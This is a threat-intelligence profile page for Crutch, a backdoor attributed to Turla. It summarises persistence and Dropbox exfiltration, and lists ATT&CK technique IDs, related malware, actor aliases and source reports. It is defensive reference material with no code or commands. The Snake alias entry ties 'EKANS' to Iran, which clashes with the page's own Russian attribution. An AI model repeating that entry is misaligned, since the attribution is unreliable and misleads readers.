Crutch

Malware Profile Updated 3 months ago

Download STIX

Preview STIX

Crutch is a sophisticated malware attributed to the Turla group, first discovered by ESET researchers in December 2020. It's considered a second-stage backdoor, achieving persistence through DLL hijacking. One notable feature of Crutch v4 is its ability to automatically upload files found on local and removable drives to Dropbox storage using the Windows version of the Wget utility, differing from previous versions that relied on backdoor commands. Older iterations of Crutch included a backdoor that communicated with a hard-coded Dropbox account via the official HTTP API. The malware was detected and reported through the use of Cortex XDR, which raised both prevention and detection alerts. These alerts were not exclusive to Crutch but also encompassed other malware such as Capibar, Kazuar, Snake, QUIETCANARY/Tunnus, Kopiluwak, ComRAT, Carbon, HyperStack, and TinyTurla. The MITRE ATT&CK techniques, a globally-accessible knowledge base of adversary tactics and techniques, were utilized in the analysis and understanding of the Crutch attacks. In terms of mitigation, several measures have been put in place. Alerts for Crutch execution prevention and detection were displayed in Cortex XDR, indicating the system's capability to both identify and prevent the malware from carrying out its intended operations. This discovery underscores the importance of robust cybersecurity measures and the continued vigilance required to combat evolving cyber threats.

What's your take? (Question 1 of 5)

Help tune the shared Cybergeist dataset, assist your peers, and earn karma. Expand the panel to get started.

Possible Aliases / Cluster overlaps

It's hard to track cluster overlaps and naming conventions between vendors, so here are some possible overlapping names / profiles you also may want to look at.

ID	Votes	Profile Description
Snake	1	Snake, also known as EKANS, is a significant threat actor that has been active since at least 2004, with its activities potentially dating back to the late 1990s. This group, which may have ties to Iran, targets diplomatic and government organizations as well as private businesses across various reg

Miscellaneous Associations

Other elements of context that could aid in the identification of relevance

Backdoor

Windows

Malware

t1074.001

T1119

t1560.001

T1008

t1102.002

T1020

T1041

Apt

t1574.001

Chrome

Outlook

T1120

Github

t1567.002

t1078.003

t1053.005

Dropbox

Firefox

Encrypt

WinRAR

Mitre

T1025

t1071.001

Implant

Dropper

t1036.004

Associated Malware

To see the evidence that has resulted in this association, create a free account

ID	Type	Votes	Profile Description
Gazer	Unspecified	1	Gazer is a second-stage backdoor malware written in C++ that was unveiled by Turla in August. It was discovered to have been deployed through watering-hole attacks and spear-phishing campaigns, enabling more precise targeting of victims. The malware is attributed to Pensive Ursa due to strong simila
FatDuke	Unspecified	1	FatDuke is a sophisticated malware that was first detected in 2013 and primarily targets government entities, defense contractors, and research institutions. The malware is known to be spread through spear-phishing attacks and has been linked to a group of hackers called APT29 or Cozy Bear. Once ins
Kazuar	Unspecified	1	Kazuar is a sophisticated multiplatform trojan horse malware, linked to the Russian-based threat group Turla (also known as Pensive Ursa, Uroburos, Snake), which has been operating since at least 2004. This group, believed to be connected to the Russian Federal Security Service (FSB), utilizes an ar
TinyTurla	Unspecified	1	TinyTurla is a sophisticated malware linked to the Russia-sponsored threat actor, Turla APT. This malicious software has been utilized in a targeted campaign against Polish Non-Governmental Organizations (NGOs), particularly those with connections to supporting Ukraine. TinyTurla operates as a backd
Capibar	Unspecified	1	Capibar, a new malware identified as part of the arsenal of the Russian-based threat group Turla (also known as Pensive Ursa, Uroburos, or Snake), has been used in recent cyberattacks. This group, linked to the Russian Federal Security Service (FSB) and active since at least 2004, has deployed Capib
HyperStack	Unspecified	1	HyperStack, also known as SilentMoo or BigBoss, is a Remote Procedure Call (RPC) backdoor malware that was first observed in 2018. It has been utilized in operations targeting European government entities and is linked to the Russian-based threat group Pensive Ursa, which has been operational since
Uroburos	Unspecified	1	Uroburos, also known as Snake, Turla, Pensive Ursa, and Venomous Bear, is a sophisticated malware linked to the Russian Federal Security Service (FSB). The development of this malicious software began in late 2003, with its operations traced back to at least 2004. Uroburos is part of a broader arsen
KOPILUWAK	Unspecified	1	KopiLuwak is a JavaScript-based malware used for command and control (C2) communications and victim profiling. It was initially dropped by Pensive Ursa using an MSIL dropper in a G20-themed attack in 2017, and later as a self-extracting archive (SFX) executable in late 2022. Upon execution, the SFX

Associated Threat Actors

To see the evidence that has resulted in this association, create a free account

ID	Type	Votes	Profile Description
Turla	Unspecified	4	Turla, also known as Pensive Ursa, is a sophisticated threat actor linked to Russia that has been active for many years. The group is known for its advanced cyber-espionage capabilities and has been associated with numerous high-profile breaches. According to the MITRE ATT&CK and MITRE Ingenuity dat
WhiteBear	Unspecified	1	WhiteBear is a threat actor that has been associated with the Turla group, also known as Snake, Venomous Bear, Uroburos, and WhiteBear. This association was established through strong links identified between a Crutch dropper from 2016 and Gazer, a second-stage backdoor used by Turla in 2016-2017. W
Pensive Ursa	Unspecified	1	Pensive Ursa, also known as Turla, Uroburos, Venomous Bear, and Waterbug, is a Russian-based advanced persistent threat (APT) group that has been operating since at least 2004. The group, linked to the Russian Federal Security Service (FSB), is renowned for its sophisticated cyber-espionage activiti
Turla Group	Unspecified	1	The Turla group, also known as Pensive Ursa, Krypton, Secret Blizzard, Venomous Bear, or Uroburos, is a notable threat actor that has been linked to the Russian Federal Security Service (FSB). With a history dating back to 2004, this group operates in painstaking stages, first conducting reconnaissa

Associated Vulnerabilities

To see the evidence that has resulted in this association, create a free account

ID	Type	Votes	Profile Description
No associations to display

Source Document References

Information about the Crutch Malware was read from the documents corpus below. This display is limited to 20 results, create a free account to see more

Source	CreatedAt	Title
Trend Micro	10 months ago	Examining the Activities of the Turla APT Group
Unit42	10 months ago	Threat Group Assessment: Turla (aka Pensive Ursa)
CERT-EU	a year ago	Matthieu Faou \| WeLiveSecurity
MITRE	a year ago	TinyTurla - Turla deploys new malware to keep a secret backdoor on victim machines
MITRE	a year ago	Turla Crutch: Keeping the “back door” open \| WeLiveSecurity